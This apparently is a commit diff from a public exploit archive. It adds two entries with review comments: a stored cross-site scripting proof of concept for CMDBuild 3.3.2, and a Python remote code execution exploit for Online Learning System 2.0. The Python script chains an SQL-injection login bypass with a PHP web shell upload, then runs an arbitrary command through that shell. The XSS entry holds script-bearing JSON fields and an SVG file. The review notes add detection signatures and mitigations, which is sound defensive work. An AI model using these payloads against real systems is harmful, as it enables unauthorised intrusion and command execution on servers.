DB: 2021-11-17
2 changes to exploits/shellcodes Online Learning System 2.0 - Remote Code Execution (RCE) CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
parent
412b034ee9
commit
11900b8459
3 changed files with 193 additions and 0 deletions
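--- a/exploits/multiple/webapps/50527.txt
+++ b/exploits/multiple/webapps/50527.txt
@@ -0,0 +1,81 @@
+# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
+# Date: 15/11/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://www.cmdbuild.org
+# Software Link: https://www.cmdbuild.org/en/download/latest-version
+# Version: CMDBuild 3.3.2
+# Tested on: Linux
+
+Summary:
+
+Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
+
+Proof of concepts :
+
+Stored Xss Example:
+
+1-Login to you'r Dashboard As a low privilege user
+2-Click On Basic archives and Employee
+3- +Add card Employee
+4- Enter your xss payload in parameters
+5-On added employee click on "Open Relation Graph"
+
+POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
+...
+Cmdbuild-Actionid: class.card.new.open
+Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
+
+Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
+X-Requested-With: XMLHttpRequest
+Content-Length: 302
+Connection: close
+
+{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
+
+
+------------------------------------------------------------------------
+
+
+File upload Xss example:
+
+1-Click on Basic archives
+2-Click on Workplace - + Add card Workplace
+3-Select "attachments" icon - +Add attachment + image
+4-Upload your svg file with xss payload
+5-Click on preview and Right click open in new tab
+
+
+
+Request:
+POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
+Cmdbuild-Actionid: class.card.attachments.open
+
+-----------------------------269319782833689825543405205260
+Content-Disposition: form-data; name="file"; filename="kiwi.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
+width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
+xml:space="preserve">
+<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
+<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
+c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
+c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
+c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
+c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
+c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
+c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
+c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
+c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
+c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
+c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
+c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
+c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
+c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
+z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
+C434.693,207.929,439.613,203.01,445.731,203.01z"/>
+<script>alert(1)</script>
+</svg>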
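Review bot: The header line `# Version: CMDBuild 3.3.2` disagrees with the summary paragraph, which attributes the stored XSS to `Tecnoteca CMDBuild 3.3.1`; anyone using this advisory to scope affected installs needs one consistent version, or the summary should state which versions were actually tested. The summary's last sentence, `Almost all add sections`, is cut off mid-thought and should be completed or dropped. The attachment vector (steps 4-5) depends on an uploaded `image/svg+xml` file being opened inline from the application's own origin, so on the mitigation side the relevant controls are serving user uploads from a separate origin or with `Content-Disposition: attachment`, and HTML-escaping card fields such as `Code`, `Surname` and `Name` wherever they are rendered, including the relation graph.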
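--- a/exploits/php/webapps/50526.py
+++ b/exploits/php/webapps/50526.py
@@ -0,0 +1,110 @@
+# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
+# Date: 15/11/2021
+# Exploit Author: djebbaranon
+# Vendor Homepage: https://github.com/oretnom23
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
+# Version: 2.0
+# Tested on: Kali linux / Windows 10
+# CVE : CVE-2021-42580
+
+#!/usr/bin/python3
+import os
+import time
+import argparse
+import requests
+import sys
+from colorama import init
+from colorama import Fore
+from colorama import Back
+from colorama import Style
+init(autoreset=True)
+def banner():
+print('''
+
+_____ _ _ _ _ _____ ______ _____ _____
+| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
+| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
+| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
+\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
+\___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
+__/ |
+|___/
+Written by djebbaranon
+twitter : @dj3bb4ran0n1
+zone-h : http://zone-h.org/archive/notifier=djebbaranon
+''')
+banner()
+def my_args():
+parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
+parser.add_argument("-u","--url",type=str,required=True,help="url of target")
+parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
+parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
+my_arguments = parser.parse_args()
+return my_arguments
+def login_with_sqli_login_bypass(user,passw):
+global session
+global url
+global cookies
+url = my_args().url
+session = requests.Session()
+data = {
+"username" : user,
+"password" : passw,
+}
+try:
+response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
+print( Fore.GREEN + "[+] Logged in succsusfully")
+cookies = response.cookies.get_dict()
+print("[+] your cookie : ")
+except requests.HTTPError as exception:
+print(Fore.RED + "[-] HTTP Error : {}".format(exception))
+sys.exit(1)
+login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
+def main(shell_name,renamed_shell):
+try:
+payload ={
+"id" : "",
+"faculty_id" : "test",
+"firstname" : "test",
+"lastname" : "test",
+"middlename" : "fsdfsd",
+"dob" : "2021-10-29",
+"gender": "Male",
+"department_id" : "1",
+"email" : "zebi@gmail.com",
+"contact" : "zebii",
+"address" : "zebii",
+}
+files = {
+"img" :
+(
+shell_name,
+"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
+"application/octet-stream",
+)
+}
+vunlerable_file = "/classes/Master.php?f=save_faculty"
+print("[*] Trying to upload webshell ....")
+response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
+print("[+] trying to bruteforce the webshell ....")
+rangee = my_args().range
+for i in range(0,rangee):
+try:
+with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
+if "nikmok" in response3.text and response3.status_code == 200:
+print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
+break
+with open("shell.txt",mode="w+") as writer:
+writer.write(response3.url)
+else:
+print( Fore.RED + "[-] shell not found : " + response3.url)
+except requests.HTTPError as exception2:
+print("[-] HTTP Error : {0} ".format(exception2))
+except requests.HTTPError as error:
+print("[-] HTTP Error : ".format(error))
+command = my_args().command
+with requests.get(response3.url.replace("whoami",command)) as response4:
+print("[*] Executing {} ....".format(command))
+time.sleep(3)
+print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
+main("hackerman.php","")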
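Review bot: `response3` in the final `with requests.get(response3.url.replace("whoami",command))` is only bound inside the `with` block of the `for i in range(0,rangee)` loop, so when no probe matched the script ends in a `NameError` instead of a message; the `except requests.HTTPError` handlers around the login, upload and probe calls also never fire, because nothing calls `raise_for_status()`, so a failed login or upload falls through silently and connection failures surface as raw tracebacks. The `with open("shell.txt",mode="w+")` block sits after `break` and is unreachable, and `verify=False` on the login POST disables TLS certificate verification for that request. The rendered listing has lost its indentation, so the body boundaries of `banner`, `my_args`, `login_with_sqli_login_bypass` and `main` cannot be checked here. For defenders, the fixed request shapes in this file are usable as web-log signatures: a POST to `/classes/Login.php?f=login` with `' or 1=1 -- -` as both `username` and `password`, a multipart POST to `/classes/Master.php?f=save_faculty` whose `img` part carries a `.php` filename, and a sequential sweep of GET `/uploads/Favatar_<n>.php?cmd=whoami`. The corresponding mitigations are parameterised queries in the login handler, server-side validation of the uploaded `img` type and extension, and serving `/uploads/` with script execution disabled.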
|
@ -44622,3 +44622,5 @@ id,file,description,date,author,type,platform,port
|
|||
50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
|
||||
50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
|
||||
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
|
||||
50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
|
||||
50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,
|
||||
|
|